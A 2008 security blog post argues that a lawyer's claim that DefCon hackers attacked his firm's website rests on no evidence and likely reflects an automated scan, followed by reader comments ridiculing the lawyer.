Tuesday, August 19, 2008

Evidence FAIL

So, first read this .

John Dozier, self-described "SuperLawyer" of the Internet, thinks you kids and your DefCon are a bunch of punks. Stay off his lawn.

Of course, I disagree. DefCon used to be a hacker conference by hackers for hackers. Now it's the BlackHat afterparty-slash-olympics. But what it isn't is a bunch of criminals. Sure, there's some mischief, and a few folks even break the rules. But everyone I know who attended DefCon this year (and that number is solidly in the double-digits), works in InfoSec, and uses what they learn at DefCon in their professional lives.

Compelling as my argument may fail to be to people like Mr. Dozier, his argument is weaker than mine. Let's dissect, shall we:

Defcon ... began August 8 and it looks like the hackers sitting in the audience and participating in the hacking competitions spent two days trying to hack into the Dozier Internet Law website using SQL Injection Attacks, Mambo Exploits, encoded cross site scripting attempts, shared ciphers overflow attempts, and the like.

The favorite and most common ISP access was from Vietnam and China, with Beijing the host and doorway of the Olympic Games as well as many, many hackers.

OK, so what we have here is a number of known, old, web attacks from China against his web server that coincide with the timing of DefCon. And aside from the timing, there's nothing to implicate anybody having anything to do with DefCon. My guess is that this wasn't even an actual human being at all, but rather an ASPROX scan that Dozier's IDS detected.

The graph above shows what these hackers do. They come to Vegas to learn how to hack into systems and create havoc.

The funny thing about this is that, with the notable exception of Dan Kaminsky's DNS attacks, there aren't IDS signatures for the research presented at DefCon. So any attacks that did come as a result of learning done at DefCon wouldn't be on that graph.

The frustrated perpetrators (they never got access) were sitting in the Riviera Hotel ballrooms, I suspect...

First, the key word there is suspect. Mr. Dozier has zero evidence that these IDS alerts had anything to do with DefCon. None. Not a shred. Second, they would've gotten in.

Going after law firm websites and administration areas that contain attorney/client protected communications and documentation, and even court ordered "sealed" files, is a direct attack on the integrity of the judicial process and the judiciary

If you have documents that are sealed by a court order stored on your company website, then you have problems. Most federal district courts won't allow you to electronically file with the court to have a document "sealed" if that document must be or otherwise is included in the filing. Those general orders aren't accidents. It's a recognition on the part of the judiciary that electronic documents are inherently less secure. But I digress.

Many attendees commit criminal acts while in attendance in organized war games.

This is simply untrue. There are organized wargames, conducted on an air-gapped network off the Internet or any other network. This is perfectly legal. The US Air Force has staffed a team in the past. By the way, congratulations to Chris Eagle and sk3wl0fr00t on their CTF win. They bested two-time champs 1@stplace, who are some of the smartest people I know, and who are all highly ethical InfoSec professionals.

Others commit criminal acts as they learn the tools of the trade in the very ballroom during speaker presentations. They hack into banks, into personal computers, into businesses, into government agencies, and steal private information, cost businesses billions of dollars annually, and ruin the financial well-being and impair the emotional stability of individuals all across our country.

This is sensational and unsubstantiated. Or as a judge would describe it, hearsay.

This is the mob of the 21st century;

No, John, this is the mob of the 21st century.

The only "security researchers" in attendance, I suspect, are the good guys.

Yes, the security researchers at DefCon are the good guys. And I promise you that the DoD and DoJ agree, as many of the speakers, attendees, volunteers, and contestants at DefCon are paid consultants to these organizations.

UPDATE: John Sawyer has an excellent write-up on this issue and on this year's DefCon (unlike John Dozier, he was actually there) on his blog, Evil Bits, over at Dark Reading. Go read.


Stephen Reese said...

Thank you for a great analysis of the "superlawyer", one could only assume he's adding to fuel to the fire just by the criticisms he has.

PaulM said...

Hi Stephen,

Thanks for the comment. His blog post definitely feels like a troll, doesn't it? And maybe he got my goat and the laugh's on me. But my concern is that, either way, somebody's going to take him seriously on this topic.


Ronald J Riley said...

Dozier is in my opinion a media hound trying to walk with the big dogs but just cannot make the grade. Lots of hype with minimal substance. A small firm with a big bark.

Read about how they got quality time from professional inventors at www.CyberTrialLawyer-SUCKS.com.

We have a number of Dozier sucks domains available for loan and welcome having volunteers to manage those domains to ensure that they receive proper rankings in search engines.

Ronald J. Riley,

Speaking only on my own behalf.
President - www.PIAUSA.org - RJR at PIAUSA.org
Executive Director - www.InventorEd.org - RJR at InvEd.org
Senior Fellow - www.patentPolicy.org
President - Alliance for American Innovation
Caretaker of Intellectual Property Creators on behalf of deceased founder Paul Heckel
Washington, DC
Direct (202) 318-1595 - 9 am to 9 pm EST.

randall said...

Anyone who refers to themselves as a "superlawyer" or really a "super"-anything, is obviously a boob. Why anyone would listen to criticism about a long-standing event and culture, from someone with no actual experience or exposure, is beyond me. Dozier is looking for publicity and hype to add to his "super"-ness. Lame. Too many leading minds in both the public and private sector have been collaborating for too long via DefCon and other events, for someone like Dozier to have anything close to resembling a leg to stand on. He's the worst of the legal system and the media and our industry, all rolled into one middle aged, out-of-touch talking head. Maybe he should run for office.

Anonymous said...

Dozier is clearly attempting to generate fear for his own personal gain. By creating the illusion of an enemy, he is able to portary himself as a just and righteous defender who protects all--but only for an attorney's fee. He's simply using the same game as the Sunday-morning "I can save you from Satan!" Televangists.

ax0n said...

I'm pretty sure Mr. Dozier "did it for the lulz."

Excellent retort, though.